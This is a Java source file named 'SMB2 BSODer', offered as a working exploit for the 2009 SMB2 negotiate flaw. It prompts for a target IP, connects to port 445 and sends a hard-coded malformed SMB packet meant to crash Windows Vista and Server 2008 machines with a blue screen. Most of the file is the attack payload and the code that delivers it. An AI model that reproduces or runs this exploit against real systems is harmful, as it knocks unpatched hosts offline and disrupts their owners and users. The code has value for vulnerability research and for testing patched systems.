/*
 * Name:    SMB2 BSODer
 * Version: 1.0
 *
 * Description: This program exploits an SMB2 protocol flaw utilizing a vulnerability
 *              first discovered by Laurent Gaffié. Tested to crash MS Windows Vista
 *              and MS Windows Server 2008 <R2 with file sharing enabled.
 *
 *              http://seclists.org/fulldisclosure/2009/Sep/0039.html
 *              http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
 *
 * Usage: java -jar SMB2_BSODer.jar
 *
 * Developed By:    Randal T. Rioux
 *                  Procyon Labs
 *                  http://www.procyonlabs.com
 *
 * Hosted: http://www.procyonlabs.com/software/smb2_bsoder
 *
 */

package smb2_bsoder;

import java.io.*;
import java.net.*;

public class Main {
    public static void main(String[] args) throws IOException {

        // ask for target IP
        System.out.print("Enter target's IP address: ");
        BufferedReader in = new BufferedReader(new InputStreamReader(System.in));
        String IP = null;

        try {
            IP = in.readLine();
        } catch (IOException ioe) {
            System.out.println("IO error trying to read IP address!");
            System.exit(1);
        }

        // define array to contain bad hex ops
        byte[] exploitCode = {(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x90, // Begin SMB header: Session message
                              (byte)0xff,(byte)0x53,(byte)0x4d,(byte)0x42, // Server Component: SMB
                              (byte)0x72,(byte)0x00,(byte)0x00,(byte)0x00, // Negotiate Protocol
                              (byte)0x00,(byte)0x18,(byte)0x53,(byte)0xc8, // Operation 0x18 and sub 0xc853
                              (byte)0x00,(byte)0x26,                       // Process ID High: Normal operation *should* be "\x00\x00"
                              (byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,
                              (byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0xff,(byte)0xff,
                              (byte)0xff,(byte)0xfe,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,
                              (byte)0x00,(byte)0x6d,(byte)0x00,(byte)0x02,(byte)0x50,(byte)0x43,
                              (byte)0x20,(byte)0x4e,(byte)0x45,(byte)0x54,(byte)0x57,(byte)0x4f,
                              (byte)0x52,(byte)0x4b,(byte)0x20,(byte)0x50,(byte)0x52,(byte)0x4f,
                              (byte)0x47,(byte)0x52,(byte)0x41,(byte)0x4d,(byte)0x20,(byte)0x31,
                              (byte)0x2e,(byte)0x30,(byte)0x00,(byte)0x02,(byte)0x4c,(byte)0x41,
                              (byte)0x4e,(byte)0x4d,(byte)0x41,(byte)0x4e,(byte)0x31,(byte)0x2e,
                              (byte)0x30,(byte)0x00,(byte)0x02,(byte)0x57,(byte)0x69,(byte)0x6e,
                              (byte)0x64,(byte)0x6f,(byte)0x77,(byte)0x73,(byte)0x20,(byte)0x66,
                              (byte)0x6f,(byte)0x72,(byte)0x20,(byte)0x57,(byte)0x6f,(byte)0x72,
                              (byte)0x6b,(byte)0x67,(byte)0x72,(byte)0x6f,(byte)0x75,(byte)0x70,
                              (byte)0x73,(byte)0x20,(byte)0x33,(byte)0x2e,(byte)0x31,(byte)0x61,
                              (byte)0x00,(byte)0x02,(byte)0x4c,(byte)0x4d,(byte)0x31,(byte)0x2e,
                              (byte)0x32,(byte)0x58,(byte)0x30,(byte)0x30,(byte)0x32,(byte)0x00,
                              (byte)0x02,(byte)0x4c,(byte)0x41,(byte)0x4e,(byte)0x4d,(byte)0x41,
                              (byte)0x4e,(byte)0x32,(byte)0x2e,(byte)0x31,(byte)0x00,(byte)0x02,
                              (byte)0x4e,(byte)0x54,(byte)0x20,(byte)0x4c,(byte)0x4d,(byte)0x20,
                              (byte)0x30,(byte)0x2e,(byte)0x31,(byte)0x32,(byte)0x00,(byte)0x02,
                              (byte)0x53,(byte)0x4d,(byte)0x42,(byte)0x20,(byte)0x32,(byte)0x2e,
                              (byte)0x30,(byte)0x30,(byte)0x32,(byte)0x00};

        // define socket info, establish connection and send data
        Socket smbSocket = null;
        DataOutputStream sendData = null;

        try {
            smbSocket = new Socket(IP, 445);
            sendData = new DataOutputStream(smbSocket.getOutputStream());
            sendData.write(exploitCode);

        } catch (UnknownHostException e) {
            System.err.println("Who is this? I see nothing at " + IP);
            System.exit(1);
        } catch (IOException e) {
            System.err.println("Couldn't get I/O for "
                               + "the connection to: " + IP);
            System.exit(1);
        }


	// goodnight
        in.close();
        sendData.close();
	smbSocket.close();
    }
}